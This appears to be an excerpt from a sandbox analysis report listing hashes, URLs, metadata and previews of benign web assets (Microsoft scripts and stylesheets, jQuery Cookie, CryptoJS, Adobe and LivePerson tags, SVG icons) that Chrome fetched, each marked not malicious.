                                                                                                                                                                                                                                                          SSDEEP:96:yjXZ9sAK618PFA5Hvsy15vm9sgsTO7wdNTB:yjXPT2Sb15vkl7wdN9
                                                                                                                                                                                                                                                          MD5:BE3F2A9F6A41FC40556EFE260FC861A5
                                                                                                                                                                                                                                                          SHA1:EF6D673802EDF44C01EEA9DD86DF4E5ACD21757E
                                                                                                                                                                                                                                                          SHA-256:C94F3B6AA377CFC8D9416F38AEDF1E49C43DE0BDC6726858720610827DF2DD3E
                                                                                                                                                                                                                                                          SHA-512:05ED779F490E9F21153E0C6838198A9E5337C4361644E62A5C99BCA3978001840CAC2E947874983FABF15573FDDA548567176F77B0393A827E27E47ECB01792A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/microsoft/clientlibs/exp-cookiecomp/v1.min.ACSHASHbe3f2a9f6a41fc40556efe260fc861a5.js
                                                                                                                                                                                                                                                          Preview:'use strict';window.ExpConsentUtils=window.ExpConsentUtils||{};window.ExpConsentUtils=function(){return{waitForObj:function(f){return new Promise(function(d,c){var h=0,k=setInterval(function(){100>h?"visitor"==f&&"object"===typeof visitor&&visitor||"consent"==f&&"undefined"!==typeof WcpConsent&&WcpConsent&&"undefined"!==typeof WcpConsent.siteConsent&&WcpConsent.siteConsent&&"undefined"!==typeof GPC_DataSharingOptIn&&null!=GPC_DataSharingOptIn?(clearInterval(k),d()):h++:(clearInterval(k),c())},50)})}}}();.var ExpConsentHandler=function(){function f(){window.ExpConsentUtils.waitForObj("visitor").then(function(){visitor.getVisitorValues(function(a){adobe.target.trackEvent({mbox:"personalizationConsent"})})}).catch(function(a){console.log(a)})}function d(){return WcpConsent&&WcpConsent.siteConsent&&void 0!==WcpConsent.siteConsent.isConsentRequired&&null!==WcpConsent.siteConsent.isConsentRequired?WcpConsent.siteConsent.isConsentRequired:!0}function c(){var a=WcpConsent&&WcpConsent.siteConse
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (505)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):1418
                                                                                                                                                                                                                                                          Entropy (8bit):5.418786110345074
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:gkWndJbDZVHGCGH0199EYCDNQNFHOS91AqCCoW40HJtmz2Xw+mlu4oFU5kveTOwD:gkw9ZVHG3HEuvNQNFv16XW1HJEkmEhUh
                                                                                                                                                                                                                                                          MD5:20AAFDF6904D3DC5DB0E0E33ABBFC1A4
                                                                                                                                                                                                                                                          SHA1:CC1A639FF69FE0D8A8F1EFEE7FCB04941E7B57C8
                                                                                                                                                                                                                                                          SHA-256:EE4E620F350907CE3867454B2BD45984BE949EB46B113183D4B8B403032DA14D
                                                                                                                                                                                                                                                          SHA-512:91B0BD81FCD2D3D040D9FC1DB74F5CA916EF88E7887D2868530BF1319EAF5462CC54421AB80FC97B258B569B9AF40F2B9FD1B6D417C9A4561BBA22EDF785D905
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-jquery-cookie.min.ACSHASH20aafdf6904d3dc5db0e0e33abbfc1a4.js
                                                                                                                                                                                                                                                          Preview:/*. jQuery Cookie Plugin v1.4.1. https://github.com/carhartl/jquery-cookie.. Copyright 2013 Klaus Hartl. Released under the MIT license.*/.'use strict';(function(d){"function"===typeof define&&define.amd?define(["jquery"],d):"object"===typeof exports?d(require("jquery")):d(jQuery)})(function(d){function l(a,c){if(e.raw)var b=a;else a:{0===a.indexOf('"')&&(a=a.slice(1,-1).replace(/\\"/g,'"').replace(/\\\\/g,"\\"));try{a=decodeURIComponent(a.replace(m," "));b=e.json?JSON.parse(a):a;break a}catch(h){}b=void 0}return d.isFunction(c)?c(b):b}var m=/\+/g,e=d.cookie=function(a,c,b){if(void 0!==c&&!d.isFunction(c)){b=d.extend({},e.defaults,b);.if("number"===typeof b.expires){var h=b.expires,g=b.expires=new Date;g.setTime(+g+864E5*h)}a=e.raw?a:encodeURIComponent(a);c=e.json?JSON.stringify(c):String(c);c=e.raw?c:encodeURIComponent(c);return document.cookie=[a,"\x3d",c,b.expires?"; expires\x3d"+b.expires.toUTCString():"",b.path?"; path\x3d"+b.path:"",b.domain?"; domain\x3d"+b.domain:"",b.secure?";
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (34534)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):51730
                                                                                                                                                                                                                                                          Entropy (8bit):4.767042349911926
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:/D5LdnuQPeXja+w8wJ4wvxp6I9NyBDOyTAowUCvYr:Iu3xtrUCvo
                                                                                                                                                                                                                                                          MD5:C54AE5DBF51FC36F3B9595B50B18E7B7
                                                                                                                                                                                                                                                          SHA1:B0708E54A0295F97116C6A5AB9D4B6C065F814E9
                                                                                                                                                                                                                                                          SHA-256:1E29CBA858E9B58E11A415E56A4ED9E562A6F91B0EBF98AF3C50AC4C551B4FBB
                                                                                                                                                                                                                                                          SHA-512:307A1DE89EFE620487F61CEDC8343D3BF173D6E6B7D78147685A5DFA0EF6BEA7CE620D59ACCB246E9A4DBE366442EDE5C70CBFE4FB565501D2937182BE934C85
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-wc-themes/power-apps.min.ACSHASHc54ae5dbf51fc36f3b9595b50b18e7b7.css
                                                                                                                                                                                                                                                          Preview:/*!. * Reimagine WC Theming v11.0.2. * OneCloud Reimagine v0.256.0. * MWF (Moray) v2.8.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2020 The Bootstrap Authors and Twitter, Inc.. */:root{--ds-spacing-1:.125rem;--ds-spacing-3xs:.125rem;--ds-spacing-2:.25rem;--ds-spacing-2xs:.25rem;--ds-spacing-3:.5rem;--ds-spacing-xs:.5rem;--ds-spacing-4:.75rem;--ds-spacing-s:.75rem;--ds-spacing-5:.75rem;--ds-spacing-m:.75rem;--ds-spacing-6:1rem;--ds-spacing-l:1rem;--ds-spacing-7:1.5rem;--ds-spacing-xl:1.5rem;--ds-spacing-8:2rem;--ds-spacing-2xl:2rem;--ds-spacing-9:3rem;--ds-spacing-3xl:3rem;--ds-spacing-10:3.5rem;--ds-spacing-4xl:3.5rem;--ds-copy-padding-s:0rem;--ds-copy-padding-m:0rem;--ds-copy-padding-l:0rem;--ds-copy-padding-xl:0rem;--ds-card-padding-default:1rem;--ds-card-padding-comfortable:1.5rem;--ds-card-padding-relaxed:2rem;--ds-breadth-vertical-default:var(--ds-spacing-4xl);--ds-breadth-vertical-relaxed:var(--ds-spacing-4xl);--ds-breadth-vertical-comfortable
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):293
                                                                                                                                                                                                                                                          Entropy (8bit):4.99262841309604
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:tnrwdhC/gKumc4slvICHfk4SYvBSKqdioEEdTc3RzSkgOktT4ekirDSM:trwdU/gKuCCHs41vBFLEd0R+hB1Dh
                                                                                                                                                                                                                                                          MD5:59873FBD0C6D18034F7CBCB0CE44CDAA
                                                                                                                                                                                                                                                          SHA1:0F5CBFB885FE94082A9BE9E5B73F23384A7F7368
                                                                                                                                                                                                                                                          SHA-256:B184ABEF90675ABAE98CB7F10796D0B82EC0F01D847A531DA87EACA9FC6E891E
                                                                                                                                                                                                                                                          SHA-512:89A5D1CC5B4DE5F113D9FACDDB31ED18F0FA87DB91253A57728D2301246C7F677799C6DED77D297C96ED60D91923B99CA7AE2407A290B0A52D64F749302346C5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M24 6.43359V22.5H7.5V0H17.5664L24 6.43359ZM18 6H21.4336L18 2.56641V6ZM22.5 21V7.5H16.5V1.5H9V21H22.5ZM0 7.5H6V9H0V7.5ZM1.5 10.5H6V12H1.5V10.5ZM3 13.5H6V15H3V13.5Z" fill="#0078D4"/>.</svg>.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):48316
                                                                                                                                                                                                                                                          Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                                                                                                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (24837)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):24949
                                                                                                                                                                                                                                                          Entropy (8bit):5.2312828786862395
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:K7+WdVXKV66F7epKZ3miCVss9hLTrheXSJ8:K7+WDmrFCpKZwVT3rUXSJ8
                                                                                                                                                                                                                                                          MD5:CDAC009AA733269D648461499E0869F2
                                                                                                                                                                                                                                                          SHA1:C74BBB5EDC41B9DB60EF45262DF964E7E60A3272
                                                                                                                                                                                                                                                          SHA-256:2E38BC618D4A4277FE6D05DA9272A916D12515FB4533C600A4EAE77F68007437
                                                                                                                                                                                                                                                          SHA-512:1C9F4CF40DEB7D5E7FA83B3DEE4D5B5AAADCB5A20AEF61DCE2B4A0A1037225E5FB3493F92BCE40F04A02CA9EB791F1AFE6F28A47E3D72F432B2DDF61F3AF45E7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://assets.adobedtm.com/5ef092d1efb5/d6d76b37b476/launch-41185cd0b005.min.js
                                                                                                                                                                                                                                                          Preview:// For license information, see `https://assets.adobedtm.com/5ef092d1efb5/d6d76b37b476/launch-41185cd0b005.js`..window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2024-02-14T10:24:39Z",turbineBuildDate:"2023-02-22T20:37:26Z",turbineVersion:"27.5.0"},environment:{id:"ENe5ac16c0abde4e0db8a4cd055e2bbf71",stage:"production"},dataElements:{cachebuster:{defaultValue:"",cleanText:!0,storageDuration:"pageview",modulePath:"core/src/lib/dataElements/randomNumber.js",settings:{max:1e6,min:1}}},extensions:{core:{displayName:"Core",hostedLibFilesBaseUrl:"https://assets.adobedtm.com/extensions/EP2e2f86ba46954a2b8a2b3bb72276b9f8/",modules:{"core/src/lib/dataElements/randomNumber.js":{name:"random-number",displayName:"Random Number",script:function(e){"use strict";e.exports=function(e){var n=Math.ceil(e.min),t=Math.floor(e.max);return n>t?NaN:Math.floor(Math.random()*(t-n+1))+n}}}}}},company:{orgId:"EA76ADE95776D2EC7F000101@AdobeOrg",dynamicCdnEnable
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):308
                                                                                                                                                                                                                                                          Entropy (8bit):4.70981696594715
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:wuCcUdfN1nwuTR6XEOW8HX3Lfau6ZlKvpuECSgwuEj2an:J8nnNR6xp3765VJa
                                                                                                                                                                                                                                                          MD5:D54C23BA76BD8648119795790AE83779
                                                                                                                                                                                                                                                          SHA1:D8D52ACAEB44EF8D5ED93D3EB65465AEFC8E8EA7
                                                                                                                                                                                                                                                          SHA-256:50F43ABADD35CC811C5C927FA149DD93E18707562D9961D82208B3261E2C1A34
                                                                                                                                                                                                                                                          SHA-512:1844CD63F89AA92C33D9D7E691B1F8DFB55F3195E86FB359719E6E81E82A98C5BBE3889D33C37499768F51DF5A48BF0633254F64E3257572566D444CCFC26FF9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/core/wcm/components/tabs/v1/tabs/clientlibs/site.min.ACSHASHd54c23ba76bd8648119795790ae83779.css
                                                                                                                                                                                                                                                          Preview:.cmp-tabs__tablist{display:flex;flex-wrap:wrap;padding-left:0;list-style:none}..cmp-tabs__tab{box-sizing:border-box;border-bottom:1px solid transparent;padding:.5rem 1rem;cursor:pointer}..cmp-tabs__tab--active{border-color:inherit}..cmp-tabs__tabpanel{display:none}..cmp-tabs__tabpanel--active{display:block}
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):681
                                                                                                                                                                                                                                                          Entropy (8bit):5.043291133932798
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:tr1tB3ut9BKXWsFYZjzFWZ8ed8Rfc3EnDiHAxcmjnDiHAxc1tnDiHA/KLtkiHAie:tTB3ut90XOsZ58Rf2ADHxvDHxkDH/Ek7
                                                                                                                                                                                                                                                          MD5:104138E7B8F89DBF7CC66485544A0669
                                                                                                                                                                                                                                                          SHA1:7C3F43BDA4BAF55F893876DC62B55800E194F135
                                                                                                                                                                                                                                                          SHA-256:FCA9EEC67C99F083AF9AA30169AF20B7DE12949D45A48FACC70B061F1F0FCBE0
                                                                                                                                                                                                                                                          SHA-512:7BE127AE63F31606BFC909476F8ACF4857726E6C5A7CCCE06FF6EB713CFA328DB58B2FBDBBB298D59030CED8853AEE4771D865DCAA487871E6F71E79CE687F98
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/Ai-icon-dark
                                                                                                                                                                                                                                                          Preview:<svg width="43" height="32" viewBox="0 0 43 32" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_14400_15452)">.<path d="M0 14.9335C0 6.68606 6.65493 0.000183105 14.8642 0.000183105H28.1358C36.3451 0.000183105 43 6.68607 43 14.9335V17.0669C43 25.3143 36.3451 32.0002 28.1358 32.0002H0V14.9335Z" fill="#004275"/>.<ellipse cx="12.6195" cy="16.4706" rx="2.33696" ry="2.35294" fill="white"/>.<ellipse cx="21.0326" cy="16.4706" rx="2.33696" ry="2.35294" fill="white"/>.<ellipse cx="29.4457" cy="16.4706" rx="2.33696" ry="2.35294" fill="white"/>.</g>.<defs>.<clipPath id="clip0_14400_15452">.<rect width="43" height="32" fill="white"/>.</clipPath>.</defs>.</svg>.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):22990
                                                                                                                                                                                                                                                          Entropy (8bit):7.982983139896656
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:Szwgx/yLF1DhBYoQYJeoCch520GrEwuHiFhEmbTu38flLqjaF/avP0U0T+n2N1NF:1U/yLFthmN70GrZuCFJbTukl2GF/OBwF
                                                                                                                                                                                                                                                          MD5:8309120C855706539E3C1024E582657E
                                                                                                                                                                                                                                                          SHA1:EFE69829E6F2CEAC0AE7FE5AD65BB9FB251BCCAD
                                                                                                                                                                                                                                                          SHA-256:C43A927278957616FFB9A741AA6412777AE8F4AA1B0415246EF2B1594DE4A142
                                                                                                                                                                                                                                                          SHA-512:0A03E2578B55B39EE10EE63A3A27F170CFD985A8FDE3337B26E2F13894D09E9A24A2536827B3A66FBC31B8431034FAA9F7DCC9CE9F984A4F5A6C891A37E260E1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/cta-stacked-1600x1080?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1600&hei=1080&qlt=95&fmt=png-alpha&fit=constrain"
                                                                                                                                                                                                                                                          Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............h..Wf.................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......@...8....pixi............av1C........colrnclx...........pixi..........av1C.......8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....ipma........................X!mdat.....*..7.P2.....$@..R.~...cL.0,.A.'y.PV....H.(..B..VL..[.W)m/=8.]...w......&H.{.."..yyxt._:z..).v+(Rk.W.u.....=u.0....HK.q.";J.RZ...Vf.....a.&...V...&G.....F.Y6....v.........*..7....B2..D........S...D.B.+.3nY.xH.:.....w>...?.V.....<,.3....&Xx..<@....R;.`AF....../.;...O..QC0-y5......!...6f.`.....\n.F.....N..V.X\.,........O.....i.B...y....!...z..n.....O..$.......W?..]9..+X.....<.:...g.[..x<z.`H+{.w......f..P..3o...!".5z}.$.=..6.i.2.$H.+.m...n,..C...%...........F.....-s...T..F*s......7g.g..zhM... ...J)#....s.......S....q.z..@..d.\..
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):9849
                                                                                                                                                                                                                                                          Entropy (8bit):4.327507698755054
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:0OQGrOUjDYq5FEF/zj2wrEEegbSYCkK2MlXW2UqEcK9MwC1uAyI9J3Yullgubepd:DrzjDYq5FEFLjRJpKJxWrqhKGXy83Y39
                                                                                                                                                                                                                                                          MD5:08C5F9CB4220E78FF920DAE3A7A8ED53
                                                                                                                                                                                                                                                          SHA1:06063CC0DE00B0F698B07DEB66DDEDE5C60940E7
                                                                                                                                                                                                                                                          SHA-256:E8B12100E50470AE78CA039D5662394A89E01C61FE8D4682DFE606E906E677ED
                                                                                                                                                                                                                                                          SHA-512:0E7ED8C068FA14123041314F58C1473DF3EB60C3B6CE1A95B1A7066C1B151D5D7EC6F2D585B2862721DB164B9CE79E61DFB6FB0A53951504BB2235739B4C35F6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/reimagine/clientlib-reimagine-base.min.ACSHASH08c5f9cb4220e78ff920dae3a7a8ed53.js
                                                                                                                                                                                                                                                          Preview:(function() {. "use strict";.. var $uhfSkipToMain = $("#uhfSkipToMain");. var $acomHeaderSkipToMain = $(".azure-skip-nav");. var href = "";. if($uhfSkipToMain.length) {. href = $uhfSkipToMain.data("href");. href = href && href.replace("#", "") || "mainContent";. } else if($acomHeaderSkipToMain.length) {. href = $acomHeaderSkipToMain[0].getAttribute("href");. href = href && href.replace("#", "") || "main";. }.. $('.microsoft-template-layout-container').attr("id", href);.})();.// This function replaces popover data-island tags insertd in RTE via the popover plugin.(function () {. if (!window || !window.ocrReimagine) {. return;. }.. window.ocrReimagine.PopoverRichTextPlugin = new class {. popoverRichTextMountSelector = '.popover-rte-mount';. popoverMountSelector = '[data-mount="popover"]';.. isPopoverComponentEnabled() {. return !!(window.mwf?.Popover);. }.. isIconComponentEna
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (27332), with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):27332
                                                                                                                                                                                                                                                          Entropy (8bit):5.48233759733871
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:sQ43HT5jFkfHlHOF1cCVVbO8IkFzjBCK2be7R1G1E2Jnkef3:sQKU6OCb68IkFRCKSV
                                                                                                                                                                                                                                                          MD5:4502CFFD9A049B7D23CF17CC2DE9B80D
                                                                                                                                                                                                                                                          SHA1:2150B19E2378B68F766A958A1408E599C556BE44
                                                                                                                                                                                                                                                          SHA-256:2823FBFA7B9256867E21AF1ECBFBB98583C8EF0E0B495F6F01D862EF58E3D93D
                                                                                                                                                                                                                                                          SHA-512:28CE499A0787323277957763ADE1B7F5341E547CF82ECE2E4B7CD4F35B250B48F87596CF2E580D7400FE5FB35D73493D932781E851E254753A61EF123EB2EA32
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:window.lpTag=window.lpTag||{};lpTag.taglets=lpTag.taglets||{};lpTag._tagv="4.1.13";!function(a,b){function c(c,d,e){b._logcnt=b._logcnt||0;H(c,d,e,b._logcnt);if("undefined"!=typeof a.lpTaglogListeners&&a.lpTaglogListeners.constructor===Array)for(var f=0;f<lpTaglogListeners.length;f++)try{lpTaglogListeners[f](c,d,e,b._logcnt)}catch(g){H("Exception="+g.message+" msg="+c,d,e,b._logcnt)}b._logcnt++}function d(a){if(a)for(var b=0;b<a.length;b++)qa[a[b].service]=a[b].baseURI}function e(){for(var a=Ga.PRODUCTION,c=b.ovr&&b.ovr.domain,d=0;d<Ha.length;d++)if(Ha[d].tagDomain===c){a=Ha[d].env;break}return a}function f(a){var c;a=a||e();if("string"==typeof a)for(var d=0;d<Ha.length;d++)if(Ha[d].env===a&&(b.tagletsPrecomputed&&Ha[d].tagletsPrecomputed||!b.tagletsPrecomputed&&!Ha[d].tagletsPrecomputed)){c=Ha[d].tagDomain;break}return c}function g(a){var b=qa[a],c="ALL";return b?b:qa[c]}function h(){return qa}function i(a){return l(ra,a)}function j(a){return l(sa,a)}function k(a,b){for(var c in b)b.h
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):539663
                                                                                                                                                                                                                                                          Entropy (8bit):5.498632862402153
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6144:4APNFoy6tMzOM9E7XbdGiovXSUteSj2d2R8:464MzO6E7XbdqS22
                                                                                                                                                                                                                                                          MD5:3807BC584F85B668CEFC639F73CFF225
                                                                                                                                                                                                                                                          SHA1:CF1640047B854F668CF7AAD8637A376AEEDBFE2B
                                                                                                                                                                                                                                                          SHA-256:7E7ACABD4A446AF2FCCA9F8D331C77B5659C0601AD7421E2A5DC24A7DDE0BEAB
                                                                                                                                                                                                                                                          SHA-512:CF963156B22553DFC480C5A17C3C22719C885FBDBC2BC58F8BA1622A3B17337CAEBEBE24813E1829335FAEA8A30251AFFEDFD6B4A85464300605F6C48184BCA3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://lptag.liveperson.net/lptag/api/account/60270350/configuration/applications/taglets/.jsonp?v=2.0&df=undefined&s=powerplatform-presales-en-us&b=undefined
                                                                                                                                                                                                                                                          Preview:lpTag.callback({"taglets":[{"name":"lpSecureStorage","type":0},{"name":"lp_testingTool","type":0},{"name":"lp_sdes","type":0},{"name":"cobrowse","type":0},{"name":"scraper","type":0},{"name":"lp_ada_enhancements","type":0,"parameters":[{"id":"enhancements","value":"{\"options\":{\"debug\":\"false\"},\"logoCSSFix\":true,\"surveyTabFix\":true,\"headerTextCSSFix\":true,\"menuKeyCloseFix\":true,\"minMaxRoleFix\":true,\"agentIsTypingFix\":true,\"offlineCSSFix\":true,\"inviteKeyCloseFix\":true,\"offlineWindowNarratorFix\":true,\"cancelBtnCSSFix\":true,\"muteBtnNarratorStateFix\":true,\"engagementFix\":true,\"overrideStyles\":{\"cancelBtnCSSFix\":\"color: #000 !important; background: #fff !important;}#lpChatButton a:focus,#lpChat a:focus, #lpChat button:focus, #lpChat input:focus, #lpChat textarea:focus, #lpChat select:focus, #lpChat .lp_textarea_field:focus, .lp_confirm_button:focus, .lp_cancel_button:focus, .lp_action_item:focus, .lp_dialog_input:focus {outline: #000000 dashed 1px !importan
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):11232
                                                                                                                                                                                                                                                          Entropy (8bit):4.6331503450371505
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:tgwsKEAOoPWvmsljFvgWIxQ7Mvdtdt+6HaAyawyQnMvxgGZUOxhBLz6PsF7TAVNQ:OKbO97gW54VPiTpnMvxDXVWxRWeE
                                                                                                                                                                                                                                                          MD5:7FA2105E727E504AAF2557640251B9A6
                                                                                                                                                                                                                                                          SHA1:341F9959BEC50971198680145E37E77177F83C6D
                                                                                                                                                                                                                                                          SHA-256:C7AAA9B5376FDE8B3DE7A92A84E336A161D4232D6238874173B305CA32567D41
                                                                                                                                                                                                                                                          SHA-512:378A637DF8E0905FBE992B8CC9F646A95640EDB4AE8A0ADCFA0DE5BF004B239FC3D5F742991BE0322C79EE72A7FA1F8E6CC68EEBC18BF205D1718FA845C7F7F7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-reimagine-page/clientlib-chatgpt-drawer.min.ACSHASH7fa2105e727e504aaf2557640251b9a6.js
                                                                                                                                                                                                                                                          Preview:(() => {. const ATTRIBUTE_SELECTORS = {. DATA_MOUNT_CHAT_AI_DRAWER: '[data-mount="ai-chat-drawer"]',. };.. const ATTRIBUTES = {. IS_AUTHOR: 'data-is-author',. IS_ENV_PROD: 'data-is-env-prod',. PARAMS: 'data-params',. };.. const EventName = {. KEY_DOWN: 'keydown',. WEBCHAT_CONNECT_FULFILLED: 'webchatconnectfulfilled'. };.. const Selector = {. WEB_CHAT_FEED: '[role="feed"]',. FOOTNOTE_LINK: '.ac-horizontal-separator + .ac-container a, .webchat__link-definitions__list-item-box--as-link',. ACTION_SET_BUTTON: '.ac-pushButton:not(.action--ai-feedback)',. POSITIVE_FEEDBACK_BUTTON: '[id$="-positive"] .ac-pushButton',. NEGATIVE_FEEDBACK_BUTTON: '[id$="-negative"] .ac-pushButton',. RELATED_LINKS: '[id$="-related"] .ac-anchor'. };.. // Constant values for the AI Chat Drawer component.. const IS_AUTHOR = document.querySelector(ATTRIBUTE_SELECTORS.DATA_MOUNT_CHAT_AI_DRAWER).getAttribute
